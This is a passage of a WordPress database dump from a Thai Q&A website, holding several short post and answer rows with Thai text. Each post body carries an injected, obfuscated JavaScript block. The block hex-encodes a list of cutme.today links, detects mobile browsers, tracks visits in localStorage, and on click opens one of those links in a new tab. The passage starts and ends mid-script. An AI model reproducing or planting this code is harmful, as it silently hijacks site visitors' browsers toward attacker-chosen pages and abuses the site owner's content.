_0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','เรื่องวันหยุด','','publish','closed','closed','','%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ab%e0%b8%a2%e0%b8%b8%e0%b8%94','','','2024-08-01 10:36:00','2024-08-01 03:36:00','',0,'http://pakhaeng.ssk.in.th/?question=%e0%b9%80%e0%b8%a3%e0%b8%b7%e0%b9%88%e0%b8%ad%e0%b8%87%e0%b8%a7%e0%b8%b1%e0%b8%99%e0%b8%ab%e0%b8%a2%e0%b8%b8%e0%b8%94',0,'question','',0),
(344,1,'2024-08-01 10:32:20','0000-00-00 00:00:00','หยุดครับ\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','#Replay - หยุดครับ by admin','','pending','','closed','','','','','2024-08-01 10:32:20','0000-00-00 00:00:00','',0,'http://pakhaeng.ssk.in.th/?post_type=answer&p=344',0,'answer','',0),
(345,1,'2024-08-01 10:34:23','0000-00-00 00:00:00','หยุดครับ\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','#Replay - หยุดครับ by admin','','pending','','closed','','','','','2024-08-01 10:34:23','0000-00-00 00:00:00','',0,'http://pakhaeng.ssk.in.th/?post_type=answer&p=345',0,'answer','',0),
(346,1,'2024-08-01 10:36:00','2024-08-01 03:36:00','หยุดครับ\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const 